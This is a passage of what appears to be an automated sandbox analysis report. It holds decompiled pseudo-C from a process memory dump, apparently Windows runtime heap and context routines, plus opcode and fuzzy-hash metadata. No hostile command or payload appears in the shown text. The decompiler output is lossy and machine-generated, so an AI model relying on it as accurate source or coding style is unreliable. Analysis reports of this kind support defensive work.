                                          						__eflags =  *((char*)(_t474 - 1));
                                          						if( *((char*)(_t474 - 1)) == 0) {
                                          							goto L92;
                                          						}
                                          						_t301 =  *_t474;
                                          						__eflags = _t494[1] - _t301;
                                          						if(_t494[1] <= _t301) {
                                          							L10:
                                          							__eflags =  *(_t474 - 5) & 0x00000040;
                                          							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                          								L12:
                                          								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                          								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                          									goto L92;
                                          								}
                                          								_t442 =  *(_t474 - 0x11) & _t494[3];
                                          								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                          								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                          									goto L92;
                                          								}
                                          								__eflags = _t442 -  *(_t474 - 0x11);
                                          								if(_t442 !=  *(_t474 - 0x11)) {
                                          									goto L92;
                                          								}
                                          								L15:
                                          								_t306 =  *(_t474 + 1) & 0x000000ff;
                                          								 *(_t528 - 0xc0) = _t306;
                                          								 *(_t528 - 0xa4) = _t306;
                                          								__eflags =  *0x10060e8;
                                          								if( *0x10060e8 != 0) {
                                          									__eflags = _t306 - 0x40;
                                          									if(_t306 < 0x40) {
                                          										L20:
                                          										asm("lock inc dword [eax]");
                                          										_t310 =  *0x10060e8; // 0x0
                                          										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                          										__eflags = _t311 & 0x00000001;
                                          										if((_t311 & 0x00000001) == 0) {
                                          											 *(_t528 - 0xa0) = _t311;
                                          											_t475 = _t427;
                                          											 *(_t528 - 0x74) = _t427;
                                          											__eflags = _t475;
                                          											if(_t475 != 0) {
                                          												L91:
                                          												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                          												goto L92;
                                          											}
                                          											asm("sbb edi, edi");
                                          											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                          											_t511 = _t498;
                                          											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                          											__eflags =  *(_t312 - 5) & 1;
                                          											if(( *(_t312 - 5) & 1) != 0) {
                                          												_push(_t528 - 0x98);
                                          												_push(0x4c);
                                          												_push(_t528 - 0x70);
                                          												_push(1);
                                          												_push(0xfffffffa);
                                          												_t412 = E00F59710();
                                          												_t475 = _t427;
                                          												__eflags = _t412;
                                          												if(_t412 >= 0) {
                                          													_t414 =  *(_t528 - 0x98) - 8;
                                          													 *(_t528 - 0x98) = _t414;
                                          													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                          													 *(_t528 - 0x8c) = _t416;
                                          													 *(_t528 - 0x79) = 1;
                                          													_t511 = (_t416 & 0x0000ffff) + _t498;
                                          													__eflags = _t511;
                                          												}
                                          											}
                                          											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                          											__eflags = _t446 & 0x00000004;
                                          											if((_t446 & 0x00000004) != 0) {
                                          												__eflags =  *(_t528 - 0x9c);
                                          												if( *(_t528 - 0x9c) != 0) {
                                          													 *(_t528 - 0x7a) = 1;
                                          													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                          													__eflags = _t511;
                                          												}
                                          											}
                                          											_t313 = 2;
                                          											_t447 = _t446 & _t313;
                                          											__eflags = _t447;
                                          											 *(_t528 - 0xd4) = _t447;
                                          											if(_t447 != 0) {
                                          												_t406 = 0x10;
                                          												_t511 = _t511 + _t406;
                                          												__eflags = _t511;
                                          											}
                                          											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                          											 *(_t528 - 0x88) = _t427;
                                          											__eflags =  *(_t528 + 0x1c);
                                          											if( *(_t528 + 0x1c) <= 0) {
                                          												L45:
                                          												__eflags =  *(_t528 - 0xb0);
                                          												if( *(_t528 - 0xb0) != 0) {
                                          													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                          													__eflags = _t511;
                                          												}
                                          												__eflags = _t475;
                                          												if(_t475 != 0) {
                                          													asm("lock dec dword [ecx+edx*8+0x4]");
                                          													goto L100;
                                          												} else {
                                          													_t494[3] = _t511;
                                          													_t451 =  *(_t528 - 0xa0);
                                          													_t427 = E00F56DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                          													 *(_t528 - 0x88) = _t427;
                                          													__eflags = _t427;
                                          													if(_t427 == 0) {
                                          														__eflags = _t511 - 0xfff8;
                                          														if(_t511 <= 0xfff8) {
                                          															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                          															asm("sbb ecx, ecx");
                                          															__eflags = (_t451 & 0x000000e2) + 8;
                                          														}
                                          														asm("lock dec dword [eax+edx*8+0x4]");
                                          														L100:
                                          														goto L101;
                                          													}
                                          													_t453 =  *(_t528 - 0xa0);
                                          													 *_t494 = _t453;
                                          													_t494[1] = _t427;
                                          													_t494[2] =  *(_t528 - 0xbc);
                                          													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                          													 *_t427 =  *(_t453 + 0x24) | _t511;
                                          													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                          													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													__eflags =  *(_t528 + 0x14);
                                          													if( *(_t528 + 0x14) == 0) {
                                          														__eflags =  *[fs:0x18] + 0xf50;
                                          													}
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													__eflags =  *(_t528 + 0x18);
                                          													if( *(_t528 + 0x18) == 0) {
                                          														_t454 =  *(_t528 - 0x80);
                                          														_t479 =  *(_t528 - 0x78);
                                          														_t327 = 1;
                                          														__eflags = 1;
                                          													} else {
                                          														_t146 = _t427 + 0x50; // 0x50
                                          														_t454 = _t146;
                                          														 *(_t528 - 0x80) = _t454;
                                          														_t382 = 0x18;
                                          														 *_t454 = _t382;
                                          														 *((short*)(_t454 + 2)) = 1;
                                          														_t385 = 0x10;
                                          														 *((short*)(_t454 + 6)) = _t385;
                                          														 *(_t454 + 4) = 0;
                                          														asm("movsd");
                                          														asm("movsd");
                                          														asm("movsd");
                                          														asm("movsd");
                                          														_t327 = 1;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 = 0x68;
                                          														 *(_t528 - 0x78) = _t479;
                                          													}
                                          													__eflags =  *(_t528 - 0x79) - _t327;
                                          													if( *(_t528 - 0x79) == _t327) {
                                          														_t524 = _t479 + _t427;
                                          														_t508 =  *(_t528 - 0x8c);
                                          														 *_t524 = _t508;
                                          														_t373 = 2;
                                          														 *((short*)(_t524 + 2)) = _t373;
                                          														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                          														 *((short*)(_t524 + 4)) = 0;
                                          														_t167 = _t524 + 8; // 0x8
                                          														E00F5F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														_t380 =  *(_t528 - 0x80);
                                          														__eflags = _t380;
                                          														if(_t380 != 0) {
                                          															_t173 = _t380 + 4;
                                          															 *_t173 =  *(_t380 + 4) | 1;
                                          															__eflags =  *_t173;
                                          														}
                                          														_t454 = _t524;
                                          														 *(_t528 - 0x80) = _t454;
                                          														_t327 = 1;
                                          														__eflags = 1;
                                          													}
                                          													__eflags =  *(_t528 - 0xd4);
                                          													if( *(_t528 - 0xd4) == 0) {
                                          														_t505 =  *(_t528 - 0x80);
                                          													} else {
                                          														_t505 = _t479 + _t427;
                                          														_t523 = 0x10;
                                          														 *_t505 = _t523;
                                          														_t367 = 3;
                                          														 *((short*)(_t505 + 2)) = _t367;
                                          														_t368 = 4;
                                          														 *((short*)(_t505 + 6)) = _t368;
                                          														 *(_t505 + 4) = 0;
                                          														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                          														_t327 = 1;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 = _t479 + _t523;
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t454;
                                          														if(_t454 != 0) {
                                          															_t186 = _t454 + 4;
                                          															 *_t186 =  *(_t454 + 4) | 1;
                                          															__eflags =  *_t186;
                                          														}
                                          														 *(_t528 - 0x80) = _t505;
                                          													}
                                          													__eflags =  *(_t528 - 0x7a) - _t327;
                                          													if( *(_t528 - 0x7a) == _t327) {
                                          														 *(_t528 - 0xd4) = _t479 + _t427;
                                          														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                          														E00F5F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + _t522;
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t505;
                                          														if(_t505 != 0) {
                                          															_t199 = _t505 + 4;
                                          															 *_t199 =  *(_t505 + 4) | 1;
                                          															__eflags =  *_t199;
                                          														}
                                          														_t505 =  *(_t528 - 0xd4);
                                          														 *(_t528 - 0x80) = _t505;
                                          													}
                                          													__eflags =  *(_t528 - 0xa8);
                                          													if( *(_t528 - 0xa8) != 0) {
                                          														_t356 = _t479 + _t427;
                                          														 *(_t528 - 0xd4) = _t356;
                                          														_t462 =  *(_t528 - 0xac);
                                          														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                          														_t485 = 0xc;
                                          														 *((short*)(_t356 + 2)) = _t485;
                                          														 *(_t356 + 6) = _t462;
                                          														 *((short*)(_t356 + 4)) = 0;
                                          														_t211 = _t356 + 8; // 0x9
                                          														E00F5F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                          														E00F5FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                          														_t529 = _t529 + 0x18;
                                          														_t427 =  *(_t528 - 0x88);
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t505 =  *(_t528 - 0xd4);
                                          														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														_t362 =  *(_t528 - 0x80);
                                          														__eflags = _t362;
                                          														if(_t362 != 0) {
                                          															_t222 = _t362 + 4;
                                          															 *_t222 =  *(_t362 + 4) | 1;
                                          															__eflags =  *_t222;
                                          														}
                                          													}
                                          													__eflags =  *(_t528 - 0xb0);
                                          													if( *(_t528 - 0xb0) != 0) {
                                          														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                          														_t458 = 0xb;
                                          														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                          														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                          														 *((short*)(_t427 + 4 + _t479)) = 0;
                                          														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                          														E00F5FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t505;
                                          														if(_t505 != 0) {
                                          															_t241 = _t505 + 4;
                                          															 *_t241 =  *(_t505 + 4) | 1;
                                          															__eflags =  *_t241;
                                          														}
                                          													}
                                          													_t328 =  *(_t528 + 0x1c);
                                          													__eflags = _t328;
                                          													if(_t328 == 0) {
                                          														L87:
                                          														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                          														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                          														_t455 =  *(_t528 - 0xdc);
                                          														 *(_t427 + 0x14) = _t455;
                                          														_t480 =  *(_t528 - 0xa0);
                                          														_t517 = 3;
                                          														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                          														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                          															asm("rdtsc");
                                          															 *(_t427 + 0x3c) = _t480;
                                          														} else {
                                          															 *(_t427 + 0x3c) = _t455;
                                          														}
                                          														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                          														_t456 =  *[fs:0x18];
                                          														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                          														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                          														_t427 = 0;
                                          														__eflags = 0;
                                          														_t511 = 0x18;
                                          														goto L91;
                                          													} else {
                                          														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                          														__eflags = _t519;
                                          														 *(_t528 - 0x8c) = _t328;
                                          														do {
                                          															_t506 =  *((intOrPtr*)(_t519 - 4));
                                          															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                          															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                          															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                          															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                          															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                          																_t334 =  *_t519;
                                          															} else {
                                          																_t334 = 0;
                                          															}
                                          															_t336 = _t334 & 0x000000ff;
                                          															__eflags = _t336;
                                          															_t427 =  *(_t528 - 0x88);
                                          															if(_t336 == 0) {
                                          																_t481 = _t479 + _t506;
                                          																__eflags = _t481;
                                          																 *(_t528 - 0x78) = _t481;
                                          																E00F5F3E0(_t479 + _t427, _t457, _t506);
                                          																_t529 = _t529 + 0xc;
                                          															} else {
                                          																_t340 = _t336 - 1;
                                          																__eflags = _t340;
                                          																if(_t340 == 0) {
                                          																	E00F5F3E0( *(_t528 - 0xb8), _t457, _t506);
                                          																	_t529 = _t529 + 0xc;
                                          																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                          																} else {
                                          																	__eflags = _t340 == 0;
                                          																	if(_t340 == 0) {
                                          																		__eflags = _t506 - 8;
                                          																		if(_t506 == 8) {
                                          																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                          																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          															_t339 = 0x10;
                                          															_t519 = _t519 + _t339;
                                          															_t263 = _t528 - 0x8c;
                                          															 *_t263 =  *(_t528 - 0x8c) - 1;
                                          															__eflags =  *_t263;
                                          															_t479 =  *(_t528 - 0x78);
                                          														} while ( *_t263 != 0);
                                          														goto L87;
                                          													}
                                          												}
                                          											} else {
                                          												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                          												 *(_t528 - 0xa2) = _t392;
                                          												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                          												__eflags = _t469;
                                          												while(1) {
                                          													 *(_t528 - 0xe4) = _t511;
                                          													__eflags = _t392;
                                          													_t393 = _t427;
                                          													if(_t392 != 0) {
                                          														_t393 =  *((intOrPtr*)(_t469 + 4));
                                          													}
                                          													_t395 = (_t393 & 0x000000ff) - _t427;
                                          													__eflags = _t395;
                                          													if(_t395 == 0) {
                                          														_t511 = _t511 +  *_t469;
                                          														__eflags = _t511;
                                          													} else {
                                          														_t398 = _t395 - 1;
                                          														__eflags = _t398;
                                          														if(_t398 == 0) {
                                          															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                          															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                          														} else {
                                          															__eflags = _t398 == 1;
                                          															if(_t398 == 1) {
                                          																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                          																_t402 =  *_t469 & 0x0000ffff;
                                          																 *(_t528 - 0xac) = _t402;
                                          																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                          															}
                                          														}
                                          													}
                                          													__eflags = _t511 -  *(_t528 - 0xe4);
                                          													if(_t511 <  *(_t528 - 0xe4)) {
                                          														break;
                                          													}
                                          													_t397 =  *(_t528 - 0x88) + 1;
                                          													 *(_t528 - 0x88) = _t397;
                                          													_t469 = _t469 + 0x10;
                                          													__eflags = _t397 -  *(_t528 + 0x1c);
                                          													_t392 =  *(_t528 - 0xa2);
                                          													if(_t397 <  *(_t528 + 0x1c)) {
                                          														continue;
                                          													}
                                          													goto L45;
                                          												}
                                          												_t475 = 0x216;
                                          												 *(_t528 - 0x74) = 0x216;
                                          												goto L45;
                                          											}
                                          										} else {
                                          											asm("lock dec dword [eax+ecx*8+0x4]");
                                          											goto L16;
                                          										}
                                          									}
                                          									_t491 = E00FE4CAB(_t306, _t528 - 0xa4);
                                          									 *(_t528 - 0x74) = _t491;
                                          									__eflags = _t491;
                                          									if(_t491 != 0) {
                                          										goto L91;
                                          									} else {
                                          										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                          										goto L20;
                                          									}
                                          								}
                                          								L16:
                                          								 *(_t528 - 0x74) = 0x1069;
                                          								L93:
                                          								_t298 =  *(_t528 - 0xd0) + 1;
                                          								 *(_t528 - 0xd0) = _t298;
                                          								_t474 = _t474 + _t511;
                                          								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                          								_t494 = 4;
                                          								__eflags = _t298 - _t494;
                                          								if(_t298 >= _t494) {
                                          									goto L100;
                                          								}
                                          								_t494 =  *(_t528 - 0xcc);
                                          								_t435 = _t298;
                                          								continue;
                                          							}
                                          							__eflags = _t494[2] | _t494[3];
                                          							if((_t494[2] | _t494[3]) == 0) {
                                          								goto L15;
                                          							}
                                          							goto L12;
                                          						}
                                          						__eflags = _t301;
                                          						if(_t301 != 0) {
                                          							goto L92;
                                          						}
                                          						goto L10;
                                          						L92:
                                          						goto L93;
                                          					}
                                          				} else {
                                          					_push(0x57);
                                          					L101:
                                          					return E00F6D130(_t427, _t494, _t511);
                                          				}
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4dd3bf132260c86d9d10993c40fd57a87ab6e2bc62e9f435bee3bffba34be52d
                                          • Instruction ID: 847d984e52f32e927edbf9e607ae459fde94f452a3fb8ff4aa4d749ab8d1fc07
                                          • Opcode Fuzzy Hash: 4dd3bf132260c86d9d10993c40fd57a87ab6e2bc62e9f435bee3bffba34be52d
                                          • Instruction Fuzzy Hash: DF427771E00269CFDB20CF69C880BA9B7B1FF59714F1481AAE94DEB242D7349A85DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E00F420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed char _v24;
                                          				intOrPtr _v28;
                                          				signed int _v32;
                                          				void* _v36;
                                          				char _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				unsigned int _v60;
                                          				char _v64;
                                          				unsigned int _v68;
                                          				signed int _v72;
                                          				char _v73;
                                          				signed int _v74;
                                          				char _v75;
                                          				signed int _v76;
                                          				void* _v81;
                                          				void* _v82;
                                          				void* _v89;
                                          				void* _v92;
                                          				void* _v97;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed char _t128;
                                          				void* _t129;
                                          				signed int _t130;
                                          				void* _t132;
                                          				signed char _t133;
                                          				intOrPtr _t135;
                                          				signed int _t137;
                                          				signed int _t140;
                                          				signed int* _t144;
                                          				signed int* _t145;
                                          				intOrPtr _t146;
                                          				signed int _t147;
                                          				signed char* _t148;
                                          				signed int _t149;
                                          				signed int _t153;
                                          				signed int _t169;
                                          				signed int _t174;
                                          				signed int _t180;
                                          				void* _t197;
                                          				void* _t198;
                                          				signed int _t201;
                                          				intOrPtr* _t202;
                                          				intOrPtr* _t205;
                                          				signed int _t210;
                                          				signed int _t215;
                                          				signed int _t218;
                                          				signed char _t221;
                                          				signed int _t226;
                                          				char _t227;
                                          				signed int _t228;
                                          				void* _t229;
                                          				unsigned int _t231;
                                          				void* _t235;
                                          				signed int _t240;
                                          				signed int _t241;
                                          				void* _t242;
                                          				signed int _t246;
                                          				signed int _t248;
                                          				signed int _t252;
                                          				signed int _t253;
                                          				void* _t254;
                                          				intOrPtr* _t256;
                                          				intOrPtr _t257;
                                          				unsigned int _t262;
                                          				signed int _t265;
                                          				void* _t267;
                                          				signed int _t275;
                                          
                                          				_t198 = __ebx;
                                          				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                          				_v68 = __ecx;
                                          				_v73 = 0;
                                          				_t201 = __edx & 0x00002000;
                                          				_t128 = __edx & 0xffffdfff;
                                          				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                          				_v72 = _t128;
                                          				if((_t128 & 0x00000008) != 0) {
                                          					__eflags = _t128 - 8;
                                          					if(_t128 != 8) {
                                          						L69:
                                          						_t129 = 0xc000000d;
                                          						goto L23;
                                          					} else {
                                          						_t130 = 0;
                                          						_v72 = 0;
                                          						_v75 = 1;
                                          						L2:
                                          						_v74 = 1;
                                          						_t226 =  *0x1008714; // 0x0
                                          						if(_t226 != 0) {
                                          							__eflags = _t201;
                                          							if(_t201 != 0) {
                                          								L62:
                                          								_v74 = 1;
                                          								L63:
                                          								_t130 = _t226 & 0xffffdfff;
                                          								_v72 = _t130;
                                          								goto L3;
                                          							}
                                          							_v74 = _t201;
                                          							__eflags = _t226 & 0x00002000;
                                          							if((_t226 & 0x00002000) == 0) {
                                          								goto L63;
                                          							}
                                          							goto L62;
                                          						}
                                          						L3:
                                          						_t227 = _v75;
                                          						L4:
                                          						_t240 = 0;
                                          						_v56 = 0;
                                          						_t252 = _t130 & 0x00000100;
                                          						if(_t252 != 0 || _t227 != 0) {
                                          							_t240 = _v68;
                                          							_t132 = E00F42EB0(_t240);
                                          							__eflags = _t132 - 2;
                                          							if(_t132 != 2) {
                                          								__eflags = _t132 - 1;
                                          								if(_t132 == 1) {
                                          									goto L25;
                                          								}
                                          								__eflags = _t132 - 6;
                                          								if(_t132 == 6) {
                                          									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                          									if( *((short*)(_t240 + 4)) != 0x3f) {
                                          										goto L40;
                                          									}
                                          									_t197 = E00F42EB0(_t240 + 8);
                                          									__eflags = _t197 - 2;
                                          									if(_t197 == 2) {
                                          										goto L25;
                                          									}
                                          								}
                                          								L40:
                                          								_t133 = 1;
                                          								L26:
                                          								_t228 = _v75;
                                          								_v56 = _t240;
                                          								__eflags = _t133;
                                          								if(_t133 != 0) {
                                          									__eflags = _t228;
                                          									if(_t228 == 0) {
                                          										L43:
                                          										__eflags = _v72;
                                          										if(_v72 == 0) {
                                          											goto L8;
                                          										}
                                          										goto L69;
                                          									}
                                          									_t133 = E00F158EC(_t240);
                                          									_t221 =  *0x1005cac; // 0x16
                                          									__eflags = _t221 & 0x00000040;
                                          									if((_t221 & 0x00000040) != 0) {
                                          										_t228 = 0;
                                          										__eflags = _t252;
                                          										if(_t252 != 0) {
                                          											goto L43;
                                          										}
                                          										_t133 = _v72;
                                          										goto L7;
                                          									}
                                          									goto L43;
                                          								} else {
                                          									_t133 = _v72;
                                          									goto L6;
                                          								}
                                          							}
                                          							L25:
                                          							_t133 = _v73;
                                          							goto L26;
                                          						} else {
                                          							L6:
                                          							_t221 =  *0x1005cac; // 0x16
                                          							L7:
                                          							if(_t133 != 0) {
                                          								__eflags = _t133 & 0x00001000;
                                          								if((_t133 & 0x00001000) != 0) {
                                          									_t133 = _t133 | 0x00000a00;
                                          									__eflags = _t221 & 0x00000004;
                                          									if((_t221 & 0x00000004) != 0) {
                                          										_t133 = _t133 | 0x00000400;
                                          									}
                                          								}
                                          								__eflags = _t228;
                                          								if(_t228 != 0) {
                                          									_t133 = _t133 | 0x00000100;
                                          								}
                                          								_t229 = E00F54A2C(0x1006e40, 0xf54b30, _t133, _t240);
                                          								__eflags = _t229;
                                          								if(_t229 == 0) {
                                          									_t202 = _a20;
                                          									goto L100;
                                          								} else {
                                          									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                          									L15:
                                          									_t202 = _a20;
                                          									 *_t202 = _t135;
                                          									if(_t229 == 0) {
                                          										L100:
                                          										 *_a4 = 0;
                                          										_t137 = _a8;
                                          										__eflags = _t137;
                                          										if(_t137 != 0) {
                                          											 *_t137 = 0;
                                          										}
                                          										 *_t202 = 0;
                                          										_t129 = 0xc0000017;
                                          										goto L23;
                                          									} else {
                                          										_t242 = _a16;
                                          										if(_t242 != 0) {
                                          											_t254 = _t229;
                                          											memcpy(_t242, _t254, 0xd << 2);
                                          											_t267 = _t267 + 0xc;
                                          											_t242 = _t254 + 0x1a;
                                          										}
                                          										_t205 = _a4;
                                          										_t25 = _t229 + 0x48; // 0x48
                                          										 *_t205 = _t25;
                                          										_t140 = _a8;
                                          										if(_t140 != 0) {
                                          											__eflags =  *((char*)(_t267 + 0xa));
                                          											if( *((char*)(_t267 + 0xa)) != 0) {
                                          												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                          											} else {
                                          												 *_t140 = 0;
                                          											}
                                          										}
                                          										_t256 = _a12;
                                          										if(_t256 != 0) {
                                          											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                          										}
                                          										_t257 =  *_t205;
                                          										_v48 = 0;
                                          										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                          										_v56 = 0;
                                          										_v52 = 0;
                                          										_t144 =  *( *[fs:0x30] + 0x50);
                                          										if(_t144 != 0) {
                                          											__eflags =  *_t144;
                                          											if( *_t144 == 0) {
                                          												goto L20;
                                          											}
                                          											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                          											goto L21;
                                          										} else {
                                          											L20:
                                          											_t145 = 0x7ffe0384;
                                          											L21:
                                          											if( *_t145 != 0) {
                                          												_t146 =  *[fs:0x30];
                                          												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                          												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                          													_t147 = E00F37D50();
                                          													__eflags = _t147;
                                          													if(_t147 == 0) {
                                          														_t148 = 0x7ffe0385;
                                          													} else {
                                          														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                          													}
                                          													__eflags =  *_t148 & 0x00000020;
                                          													if(( *_t148 & 0x00000020) != 0) {
                                          														_t149 = _v72;
                                          														__eflags = _t149;
                                          														if(__eflags == 0) {
                                          															_t149 = 0xef5c80;
                                          														}
                                          														_push(_t149);
                                          														_push( &_v48);
                                          														 *((char*)(_t267 + 0xb)) = E00F4F6E0(_t198, _t242, _t257, __eflags);
                                          														_push(_t257);
                                          														_push( &_v64);
                                          														_t153 = E00F4F6E0(_t198, _t242, _t257, __eflags);
                                          														__eflags =  *((char*)(_t267 + 0xb));
                                          														if( *((char*)(_t267 + 0xb)) != 0) {
                                          															__eflags = _t153;
                                          															if(_t153 != 0) {
                                          																__eflags = 0;
                                          																E00F97016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                          																L00F32400(_t267 + 0x20);
                                          															}
                                          															L00F32400( &_v64);
                                          														}
                                          													}
                                          												}
                                          											}
                                          											_t129 = 0;
                                          											L23:
                                          											return _t129;
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L8:
                                          							_t275 = _t240;
                                          							if(_t275 != 0) {
                                          								_v73 = 0;
                                          								_t253 = 0;
                                          								__eflags = 0;
                                          								L29:
                                          								_push(0);
                                          								_t241 = E00F42397(_t240);
                                          								__eflags = _t241;
                                          								if(_t241 == 0) {
                                          									_t229 = 0;
                                          									L14:
                                          									_t135 = 0;
                                          									goto L15;
                                          								}
                                          								__eflags =  *((char*)(_t267 + 0xb));
                                          								 *(_t241 + 0x34) = 1;
                                          								if( *((char*)(_t267 + 0xb)) != 0) {
                                          									E00F32280(_t134, 0x1008608);
                                          									__eflags =  *0x1006e48 - _t253; // 0x0
                                          									if(__eflags != 0) {
                                          										L48:
                                          										_t253 = 0;
                                          										__eflags = 0;
                                          										L49:
                                          										E00F2FFB0(_t198, _t241, 0x1008608);
                                          										__eflags = _t253;
                                          										if(_t253 != 0) {
                                          											L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                          										}
                                          										goto L31;
                                          									}
                                          									 *0x1006e48 = _t241;
                                          									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                          									__eflags = _t253;
                                          									if(_t253 != 0) {
                                          										_t57 = _t253 + 0x34;
                                          										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                          										__eflags =  *_t57;
                                          										if( *_t57 == 0) {
                                          											goto L49;
                                          										}
                                          									}
                                          									goto L48;
                                          								}
